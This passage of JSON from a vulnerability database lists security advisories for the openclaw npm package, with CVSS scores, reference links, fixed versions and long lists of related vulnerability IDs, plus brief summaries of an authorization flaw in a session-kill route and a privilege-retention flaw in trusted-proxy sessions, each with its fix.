                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w85g-3h6x-4xh2",
                    "reference_id": "GHSA-w85g-3h6x-4xh2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w85g-3h6x-4xh2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-w85g-3h6x-4xh2"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-38g8-39ek-xbat"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91639?format=api",
            "vulnerability_id": "VCID-3bdd-a9nw-13bn",
            "summary": "OpenClaw: Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding\n## Summary\n\nGateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding.\n\n## Details\n\nThe HTTP route previously treated any bearer-authenticated request as admin-eligible and could reach the admin kill path without binding the action to requester ownership or caller-granted operator scopes. The fix removes the bearer-token admin fallback and keeps remote session kills on the local-admin or requester-owned path only.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9p93-7j67-5pc2",
                    "reference_id": "GHSA-9p93-7j67-5pc2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9p93-7j67-5pc2"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "GHSA-9p93-7j67-5pc2"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3bdd-a9nw-13bn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91121?format=api",
            "vulnerability_id": "VCID-3pqp-bneb-mbc4",
            "summary": "OpenClaw's Trusted-proxy Control UI sessions retain privileged scopes without device identity on device-less allow paths\n## Summary\nTrusted-proxy Control UI sessions without device identity could retain self-declared privileged scopes on the device-less allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ccf16cd8892402022439346ae1d23352e3707e9e`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server/ws-connection/message-handler.ts now strips unbound self-declared scopes on the trusted-proxy no-device path.\n- src/gateway/server/ws-connection/connect-policy.ts remains the allow path, but the shipped scope scrub prevents privilege retention without device identity.\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-48vw-m3qc-wr99",
                    "reference_id": "GHSA-48vw-m3qc-wr99",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-48vw-m3qc-wr99"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
